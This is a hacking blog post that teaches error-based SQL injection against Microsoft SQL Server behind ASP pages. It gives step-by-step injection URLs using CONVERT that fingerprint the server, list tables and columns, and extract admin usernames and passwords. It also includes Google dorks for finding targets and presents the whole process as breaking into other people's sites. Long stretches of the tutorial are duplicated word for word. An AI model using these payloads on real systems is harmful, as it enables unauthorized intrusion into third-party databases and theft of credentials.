So Guys as we hacked many sqli and my sqli site.Now its time to target Microsoft.In this post ill tell u how to hack MSSQL sites....
There are various types of sql injection for MICROSOFT here as follows
1)ODBC Error Message Attack with "CONVERT"
2)ODBC Error Message Attack with "HAVING" and "GROUP BY"
3)MSSQL Injection with UNION Attack
4)MSSQL Injection in Web Services (SOAP Injection)
5)MSSQL Blind SQL Injection Attack
1)ODBC Error Message Attack with "CONVERT"
2)ODBC Error Message Attack with "HAVING" and "GROUP BY"
3)MSSQL Injection with UNION Attack
4)MSSQL Injection in Web Services (SOAP Injection)
5)MSSQL Blind SQL Injection Attack
Here m going to explain the first one "sql with convert"
STEP 1:
First we need to find a vulnerable site.
By adding a single quote (') double quote (";") or a semicolon to the field under test.
eg:
http://www.example.com/news.asp?id=10'
http://www.example.com/news.asp?id=10;
It's vulnerable in SQL injection,If the output shows some error like this:
[HTTP Response]------------------------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
character string ''.
/news.asp, line 52
[End HTTP Response]-------------------------------------------------------------------------
Also error could be something like below
Microsoft OLE DB Provider for SQL Server error '80040e14 '
Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.
..../ main_rub.asp, line 4
If the errors like above are shown then site could be vulnerable in SQL
Also you can find vulnerable site from google dork.
eg
inurl:age.asp?id=
inurl:index.asp?sid=
u can see sql dorks in my old posts.
STEP 2:
Now we got our vulnerable website.
CONVERT command is used to convert between two data types and when the specific
data cannot convert to another type the error will be returned.
Now we start with our assessment by finding MSSQL_Version, DB_name.
http://www.example.com/page.asp?id=1+and+1=convert(int,@@version)
[http response]-------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00
(Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.
/includes/templates/header.asp, line 21
-----------------------------------------------------------
We know now,its a Microsoft SQL Server 2005 n OS (Windows 2003 Server) (Build 3790: Service Pack 2)
Let's go to enumerate DB_name.
http://www.example.com/page.asp?id=1+and+1=convert(int,db_name())--
[http response]--------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'IPC' to data type int.
/includes/templates/header.asp, line 21
------------------------------------------------------------
The data base name is IPC.
http://www.example.com/page.asp?id=1+and+1=convert(int,user_name())--
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'ipcdc' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
The use operating database is ipcdc....
STEP 3:
NOW LETS FIND TABLES IN DATABASE
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl e_name+from+information_schema.tables))--
"information_schema.tables" stores information about tables in databases and there is a field called "table_name"
which stores names of each table."SELECT TOP 1" will show first table in database.
The result of this request is something like this:
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'siteStatus' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
Therefore, we know the first table = "siteStatus", from this error. The next step is looking for the second table.
We only put WHERE clause append the query in above request.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus')))--
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'headerGraphic' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
Second table 'headerGraphic'
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus','headerGraphic')))--
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'admin' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
third table 'admin'
Like this you will get each table name from the error.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus','headerGraphic','admin') ))--
If the query returns something like this.
[http response]----------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 22
-----------------------------------------------------------------
IT MEANS DATABASE CONTAINS ONLY 3 TABLES 'siteStatus','headerGraphic' n 'admin'.
STEP 4:
Now we are all set.....and we will find columns in admin table
We merely change from "information_schema.tables" to "information_schema.columns" and from "table_name" to "column_name"
but we have to add "table_name" in WHERE cluase in order to specify the table which we will pull column names from.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+colu mn_name+from+information_schema.columns+where+tabl e_name='admin'))--
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'username' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+colu mn_name+from+information_schema.columns+where+tabl e_name='admin'+and+column_name+not+in+('username') ))--
the response will be
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'passwd' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
So 2nd column is 'passwd'
Do this like we did url manipulation for tables .
Now we got our vulnerable website.
CONVERT command is used to convert between two data types and when the specific
data cannot convert to another type the error will be returned.
Now we start with our assessment by finding MSSQL_Version, DB_name.
http://www.example.com/page.asp?id=1+and+1=convert(int,@@version)
[http response]-------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00
(Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.
/includes/templates/header.asp, line 21
-----------------------------------------------------------
We know now,its a Microsoft SQL Server 2005 n OS (Windows 2003 Server) (Build 3790: Service Pack 2)
Let's go to enumerate DB_name.
http://www.example.com/page.asp?id=1+and+1=convert(int,db_name())--
[http response]--------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'IPC' to data type int.
/includes/templates/header.asp, line 21
------------------------------------------------------------
The data base name is IPC.
http://www.example.com/page.asp?id=1+and+1=convert(int,user_name())--
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'ipcdc' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
The use operating database is ipcdc....
STEP 3:
NOW LETS FIND TABLES IN DATABASE
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl e_name+from+information_schema.tables))--
"information_schema.tables" stores information about tables in databases and there is a field called "table_name"
which stores names of each table."SELECT TOP 1" will show first table in database.
The result of this request is something like this:
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'siteStatus' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
Therefore, we know the first table = "siteStatus", from this error. The next step is looking for the second table.
We only put WHERE clause append the query in above request.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus')))--
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'headerGraphic' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
Second table 'headerGraphic'
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus','headerGraphic')))--
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'admin' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
third table 'admin'
Like this you will get each table name from the error.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus','headerGraphic','admin') ))--
If the query returns something like this.
[http response]----------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 22
-----------------------------------------------------------------
IT MEANS DATABASE CONTAINS ONLY 3 TABLES 'siteStatus','headerGraphic' n 'admin'.
STEP 4:
Now we are all set.....and we will find columns in admin table
We merely change from "information_schema.tables" to "information_schema.columns" and from "table_name" to "column_name"
but we have to add "table_name" in WHERE cluase in order to specify the table which we will pull column names from.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+colu mn_name+from+information_schema.columns+where+tabl e_name='admin'))--
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'username' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+colu mn_name+from+information_schema.columns+where+tabl e_name='admin'+and+column_name+not+in+('username') ))--
the response will be
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'passwd' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
So 2nd column is 'passwd'
Do this like we did url manipulation for tables .
Dont forget to add where clause .untill u get error like this.
[http response]----------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 22
-----------------------------------------------------------------
STEP 5: RETRIEVING USENAME n PASSWORD etc
Now lets see what we got from above
table_name: 'admin','siteStatus' n 'HeaderGraphic'
Here we are interestedin 'admin'.So we found columns fo 'admin'
column_name:'username' n 'passwd'
LETS do our work now
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+user name+from+admin))--
You will get first username in terms of error
eg sa_admin
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+pass wd+from+admin))--
You will get passwd.
eg comic123
So u own .....MSSQL server wid
USERNAME: sa_admin
PASSWORD:comic123
note:
1) you can use AND/OR both
2) Dnt forget , (comma) after 'int' in convert()
3) In error after ' (upper comma) is your table_name of column_name or etc
4)you can enemerate more usernames n passwords by using 'not' command
1) you can use AND/OR both
2) Dnt forget , (comma) after 'int' in convert()
3) In error after ' (upper comma) is your table_name of column_name or etc
4)you can enemerate more usernames n passwords by using 'not' command
Grab This Widget
Posts
0 comments:
Post a Comment
Please feel free to comment !!!!!!!!!!!!!